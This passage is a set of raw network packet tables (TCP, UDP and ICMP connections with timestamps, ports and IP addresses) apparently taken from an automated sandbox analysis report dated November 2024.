                                                                                                                                            Nov 6, 2024 16:40:52.552345037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.588274002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.588301897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.588388920 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.588397026 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.588435888 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.609272957 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.609302998 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.609378099 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.609384060 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.609422922 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.610426903 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610440969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610496044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.610498905 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610536098 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.610745907 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610760927 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610791922 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.610795021 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.610825062 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.610841036 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.611423016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.611437082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.611474037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.611478090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.611506939 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.611536026 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.612262011 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.612277031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.612314939 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.612318039 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.612350941 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.614348888 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.614367962 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.614411116 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.614419937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.614475012 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.614662886 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.617479086 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.617501020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.617542028 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.617546082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.617580891 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.619126081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.619144917 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.619209051 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.619211912 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.619251966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621313095 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621335983 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621396065 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621401072 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621427059 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621438026 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621445894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621457100 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621469975 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621504068 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621767998 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621783972 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621834993 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.621839046 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.621880054 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.622298002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.622313023 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.622354984 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.622358084 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.622380018 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.622399092 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.645011902 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.669580936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.669605970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670171976 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670195103 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670200109 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670229912 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670274973 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670401096 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670414925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670453072 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670456886 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.670474052 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670495033 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.670984983 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.671004057 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.671060085 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.671063900 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.671097994 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.706100941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.706120968 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.706196070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.706222057 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.706285000 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.728238106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728264093 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728342056 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.728359938 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728415966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.728842020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728858948 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728904963 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.728909016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.728950024 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.730007887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730029106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730063915 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.730068922 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730096102 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.730112076 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.730422974 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730437040 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730484962 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.730489016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.730526924 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.731081963 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.731101990 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.731137037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.731141090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.731164932 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.731184006 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.732146025 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.732161045 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.732220888 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.732224941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.732239008 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.732259989 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.734858990 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.734874010 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.734924078 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.734927893 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.734952927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.734972954 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.739393950 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.739427090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.739458084 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.739460945 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.739474058 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.739499092 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.739523888 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.805629969 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.805656910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:26.958404064 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:26.958498955 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:41:26.962182999 CET4977632520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:41:26.964212894 CET5735832520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:41:26.968316078 CET3252049776120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:26.969069958 CET3252057358120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:26.969245911 CET5735832520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:41:27.858249903 CET3252057358120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:27.910211086 CET5735832520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:41:42.958410025 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:41:42.958549976 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:42:10.253900051 CET5735580192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:42:10.253968000 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:42:10.258862972 CET8057355107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:10.259198904 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:10.259257078 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:42:37.041991949 CET3252057358120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.042191982 CET5735832520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:42:37.049464941 CET5735832520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:42:37.052876949 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:42:37.054344893 CET3252057358120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.057703972 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.057804108 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:42:37.974668026 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:38.081993103 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.167337894 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.167538881 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.173445940 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.176353931 CET5736032520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.178347111 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.181188107 CET3252057360120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.181304932 CET5736032520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:48.228708982 CET3252057360120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:48.284986019 CET5736032520192.168.2.10120.27.243.153

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 6, 2024 16:40:14.939805031 CET5402053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:15.377311945 CET53540201.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.200925112 CET53508271.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:20.272250891 CET6128453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:21.269759893 CET6128453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:21.407257080 CET53612841.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:21.407479048 CET53612841.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.815979958 CET5816153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:24.818273067 CET5061653192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET53581611.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:25.565762997 CET6197953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:25.816654921 CET5061653192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET53506161.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET53506161.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.093278885 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:26.107685089 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.113012075 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.120371103 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.124435902 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.128519058 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.131423950 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.132817030 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.137305021 CET5909453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.286636114 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.335293055 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.335452080 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.336807013 CET5909953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.342461109 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET53619791.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.375659943 CET5347553192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.576039076 CET53534751.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.608295918 CET53590991.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.608715057 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.616324902 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.616519928 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.623446941 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.623603106 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.630683899 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.630814075 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.638008118 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.928164959 CET8000902747.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.936920881 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:26.938056946 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:26.938412905 CET534768000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:27.002422094 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:27.002422094 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.201967001 CET5909453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET53590941.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET53590941.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.816458941 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.817034006 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:28.199829102 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.210088015 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.228014946 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.252310991 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.431875944 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.566091061 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.810869932 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:29.989955902 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:29.989955902 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.400717020 CET90278000192.168.2.1047.102.130.81
                                                                                                                                            Nov 6, 2024 16:40:31.400763035 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:32.113881111 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:32.146684885 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.162239075 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.170187950 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.176843882 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.177767992 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.236522913 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.236623049 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.243459940 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.278858900 CET5382953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.296195984 CET53538291.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.458899021 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.459172964 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.460481882 CET5724953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.465991974 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.970666885 CET53572491.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.970988035 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.977638960 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.977791071 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.984564066 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.984833956 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.992218971 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.996814013 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:33.003587008 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.163188934 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:34.185591936 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.278654099 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.398471117 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.498857021 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.605325937 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.770466089 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.085035086 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:37.456243992 CET8000902747.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.470400095 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:37.470753908 CET572508000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:37.476475000 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:37.476517916 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:37.870971918 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.871175051 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:38.276552916 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.296828032 CET80005725047.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.498070955 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:40.498137951 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:41.260948896 CET4983253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:41.395823956 CET53498321.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:42.381524086 CET90278000192.168.2.1047.102.130.81
                                                                                                                                            Nov 6, 2024 16:40:42.381562948 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:42.778264046 CET4966353192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET53496631.1.1.1192.168.2.10

                                                                                                                                            ICMP Packets

                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                            Nov 6, 2024 16:40:21.407730103 CET192.168.2.101.1.1.1c222(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.002461910 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.002470970 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.366147041 CET192.168.2.101.1.1.1c2b1(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:29.990015030 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:29.990029097 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:37.476507902 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
